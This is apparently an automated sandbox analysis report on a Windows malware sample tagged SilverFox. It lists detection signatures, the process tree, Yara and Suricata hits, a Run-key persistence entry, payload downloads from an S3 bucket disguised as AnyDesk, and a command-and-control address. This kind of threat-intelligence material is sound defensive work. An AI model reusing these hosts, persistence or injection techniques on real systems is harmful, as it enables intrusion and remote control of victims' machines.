Windows Analysis Report
VJQyKuHEUe.exe

Overview

General Information

Sample name: VJQyKuHEUe.exe
renamed because original name is a hash value
Original sample name: 7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0.exe
Analysis ID: 1577406
MD5: 703274fa7a3febb125ce7ea741a2d546
SHA1: 557e4513056574074cb1a4070842561519136ec9
SHA256: 7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0
Tags: anydesk17-s3-ap-east-1-amazonaws-com, exe, SilverFox, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VJQyKuHEUe.exe (PID: 1472 cmdline: "C:\Users\user\Desktop\VJQyKuHEUe.exe" MD5: 703274FA7A3FEBB125CE7EA741A2D546)
    • zfon.exe (PID: 6208 cmdline: "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 2000 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
        • WerFault.exe (PID: 6476 cmdline: C:\Windows\system32\WerFault.exe -u -p 2000 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 4160 cmdline: C:\Windows\system32\WerFault.exe -u -p 2000 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • hh.exe (PID: 5780 cmdline: C:\windows\hh.exe MD5: 2C8FE78D53C8CA27523A71DFD2938241)
  • explorer.exe (PID: 6412 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • zfon.exe (PID: 6632 cmdline: "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 1996 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 6528 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 6160 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 1476 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 5672 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 2172 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 5592 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x30f3c5:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x3e9299:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source | Rule | Description | Author | Strings
0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x136033:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x43ebc:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x2df1c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source | Rule | Description | Author | Strings
6.2.zfon.exe.7ff7f96e0000.0.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x136433:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 27.50.63.8, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\hh.exe, Initiated: true, ProcessId: 5780, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49794
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OpenAI_Service
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:06:30.366027+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.5 | 49794 | 27.50.63.8 | 4433 | TCP
2024-12-18T13:07:44.715735+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.5 | 49794 | 27.50.63.8 | 4433 | TCP
2024-12-18T13:08:49.924265+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 27.50.63.8 | 4433 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:05:50.566344+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 3.5.237.31 | 443 | TCP
2024-12-18T13:05:54.492005+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 3.5.238.183 | 443 | TCP
2024-12-18T13:05:58.604327+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 3.5.238.183 | 443 | TCP
2024-12-18T13:06:01.843523+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 3.5.239.146 | 443 | TCP
2024-12-18T13:06:04.720219+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49743 | 3.5.239.146 | 443 | TCP
2024-12-18T13:06:09.012883+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49749 | 52.95.161.33 | 443 | TCP

AV Detection

Source: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png, Avira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png, Avira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll, Avira URL Cloud: Label: malware
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.raw, ReversingLabs: Detection: 23%
Source: VJQyKuHEUe.exe, ReversingLabs: Detection: 34%
Source: VJQyKuHEUe.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Unpacked PE file: 6.2.zfon.exe.7ff7f96e0000.0.unpack
Source: unknown, HTTPS traffic detected: 3.5.237.31:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: VJQyKuHEUe.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: zfon.exe, 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000006.00000002.2624943938.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001A.00000002.2822975181.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001B.00000002.2822877853.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001C.00000002.2982816689.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001D.00000002.2982816052.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001E.00000002.3573056415.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001F.00000002.3573084819.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000022.00000002.4198997991.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000023.00000002.4198930072.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\code\personal\soft_distribute_tags\code\CSharpInstaller13\obj\Release\counterstand.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: q8EC:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: C:\Windows\hh.exe, File opened: z:
Source: C:\Windows\hh.exe, File opened: x:
Source: C:\Windows\hh.exe, File opened: v:
Source: C:\Windows\hh.exe, File opened: t:
Source: C:\Windows\hh.exe, File opened: r:
Source: C:\Windows\hh.exe, File opened: p:
Source: C:\Windows\hh.exe, File opened: n:
Source: C:\Windows\hh.exe, File opened: l:
Source: C:\Windows\hh.exe, File opened: j:
Source: C:\Windows\hh.exe, File opened: h:
Source: C:\Windows\hh.exe, File opened: f:
Source: C:\Windows\explorer.exe, File opened: d:
Source: C:\Windows\hh.exe, File opened: b:
Source: C:\Windows\hh.exe, File opened: y:
Source: C:\Windows\hh.exe, File opened: w:
Source: C:\Windows\hh.exe, File opened: u:
Source: C:\Windows\hh.exe, File opened: s:
Source: C:\Windows\hh.exe, File opened: q:
Source: C:\Windows\hh.exe, File opened: o:
Source: C:\Windows\hh.exe, File opened: m:
Source: C:\Windows\hh.exe, File opened: k:
Source: C:\Windows\hh.exe, File opened: i:
Source: C:\Windows\hh.exe, File opened: g:
Source: C:\Windows\hh.exe, File opened: e:
Source: C:\Windows\explorer.exe, File opened: c:
Source: C:\Windows\hh.exe, File opened: [:
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 5_2_00007FF8B90F0E70 FindFirstFileExW,FindClose,wcscpy_s,5_2_00007FF8B90F0E70
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB8FF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,7_2_000001CDCB8FF350
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 26_2_00007FF8A9360E70 FindFirstFileExW,FindClose,wcscpy_s,26_2_00007FF8A9360E70
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 28_2_00007FF8A8010E70 FindFirstFileExW,FindClose,wcscpy_s,28_2_00007FF8A8010E70
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370

Networking

Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49794 -> 27.50.63.8:4433
Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:50012 -> 27.50.63.8:4433
Source: global traffic, TCP traffic: 192.168.2.5:49794 -> 27.50.63.8:4433
Source: global traffic, HTTP traffic detected: GET /zfon.exe HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /view.png HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, HTTP traffic detected: GET /aut.png HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, HTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, HTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, HTTP traffic detected: GET /MSVCP140.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, HTTP traffic detected: GET /libcef.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: Joe Sandbox View, IP Address: 27.50.63.8
Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 3.5.238.183:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 3.5.237.31:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 3.5.238.183:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 3.5.239.146:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 3.5.239.146:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49749 -> 52.95.161.33:443
Source: unknown, TCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB8F3B00 recv,7_2_000001CDCB8F3B00
Source: global traffic, DNS traffic detected: DNS query: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic, DNS traffic detected: DNS query: api.msn.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.comd
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: VJQyKuHEUe.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
